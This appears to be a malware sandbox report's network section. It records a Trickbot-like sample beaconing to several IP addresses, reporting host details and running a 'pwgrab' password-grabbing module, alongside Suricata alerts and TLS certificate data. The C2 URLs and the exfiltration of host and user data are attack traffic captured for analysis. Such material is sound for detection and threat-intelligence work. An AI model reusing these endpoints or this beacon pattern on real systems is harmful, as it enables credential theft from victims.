NetWork | ZeroBOX

IP Address	Status	Action
103.26.251.214	Active	Moloch
12.158.156.51	Active	Moloch
137.27.167.58	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
24.182.101.64	Active	Moloch
45.164.80.94	Active	Moloch
67.212.241.127	Active	Moloch
67.79.117.70	Active	Moloch
72.180.57.176	Active	Moloch
75.87.15.158	Active	Moloch
95.217.228.176	Active	Moloch
98.6.170.206	Active	Moloch

Name	Response	Post-Analysis Lookup
150.134.208.175.b.barracudacentral.org	A 127.0.0.2	127.0.0.2
150.134.208.175.zen.spamhaus.org
wtfismyip.com	A 95.217.228.176	95.217.228.176
150.134.208.175.cbl.abuseat.org

TCP Requests

UDP Requests

GET 200 https://72.180.57.176/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/

GET 200 https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/

GET 200 https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/jdtzrTn7D1fhJNbBNVH7NJBPBDzrN/

GET 200 https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/

GET 200 https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/

GET 200 https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CNetDownloadMng5575191179%5Cxzcountlb.dwn/0/

GET 200 https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/NAT%20status/client%20is%20behind%20NAT/0/

GET 200 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/

GET 200 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/1jdJTPhNJftt9llb5HDzBt1d1t3/

GET 200 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/

GET 200 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/

GET 200 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/NAT%20status/client%20is%20behind%20NAT/0/

GET 403 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/10/62/QHAVHUMUVKIZYSUYVK/7/

GET 404 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/23/2000027/

GET 200 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/DNSBL/listed/0/

GET 200 https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/1/pxPtLlVV7rz3hFHPxXVH9ntpH3/

GET 200 https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/

GET 200 https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/JXX9LFPNtFT75Htn3nVXhlnxNLP/

GET 200 https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/

GET 200 https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/

GET 200 https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/1/4j4pxaBWesD3gH7yYCXrlLdHM/

GET 200 https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/10/62/707854/0/

GET 200 https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/pwgrab/sTart%20Run%20D%20failed/0/

GET 200 https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/pwgrab64/reload1/0/

GET 200 http://wtfismyip.com/text

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49814 -> 72.180.57.176:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 72.180.57.176:443 -> 192.168.56.102:49814	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49823 -> 45.164.80.94:447	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 45.164.80.94:447 -> 192.168.56.102:49823	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49815 -> 75.87.15.158:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 75.87.15.158:443 -> 192.168.56.102:49815	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49821 -> 67.79.117.70:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 67.79.117.70:443 -> 192.168.56.102:49821	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49818 -> 98.6.170.206:447	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 98.6.170.206:447 -> 192.168.56.102:49818	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49826 -> 137.27.167.58:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 137.27.167.58:443 -> 192.168.56.102:49826	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49830 -> 24.182.101.64:449	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 24.182.101.64:449 -> 192.168.56.102:49830	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.102:49816 -> 95.217.228.176:80	2019737	ET POLICY IP Check wtfismyip.com	Potential Corporate Privacy Violation
TCP 192.168.56.102:49816 -> 95.217.228.176:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49814 72.180.57.176:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	a1:ea:a4:fa:0a:5e:ba:b9:c1:46:42:a3:0b:3e:a6:e7:b4:e2:f7:f0
TLSv1 192.168.56.102:49823 45.164.80.94:447	C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd	C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd	f1:ae:ef:9b:5f:b8:da:ca:2f:e8:b4:99:1d:16:71:ca:08:11:be:e4
TLSv1 192.168.56.102:49815 75.87.15.158:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	81:c4:f0:b6:a7:40:f0:09:2b:ab:2a:1c:df:80:a0:30:da:d8:93:79
TLSv1 192.168.56.102:49821 67.79.117.70:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	81:c4:f0:b6:a7:40:f0:09:2b:ab:2a:1c:df:80:a0:30:da:d8:93:79
TLSv1 192.168.56.102:49818 98.6.170.206:447	C=US, ST=Some-State, O=Internet Widgits Pty Ltd	C=US, ST=Some-State, O=Internet Widgits Pty Ltd	8d:b6:86:81:b0:6b:e5:0a:58:13:73:ec:a7:95:6f:f6:4b:e2:e9:d8
TLSv1 192.168.56.102:49826 137.27.167.58:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	81:c4:f0:b6:a7:40:f0:09:2b:ab:2a:1c:df:80:a0:30:da:d8:93:79
TLSv1 192.168.56.102:49830 24.182.101.64:449	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	81:c4:f0:b6:a7:40:f0:09:2b:ab:2a:1c:df:80:a0:30:da:d8:93:79

Snort Alerts

No Snort Alerts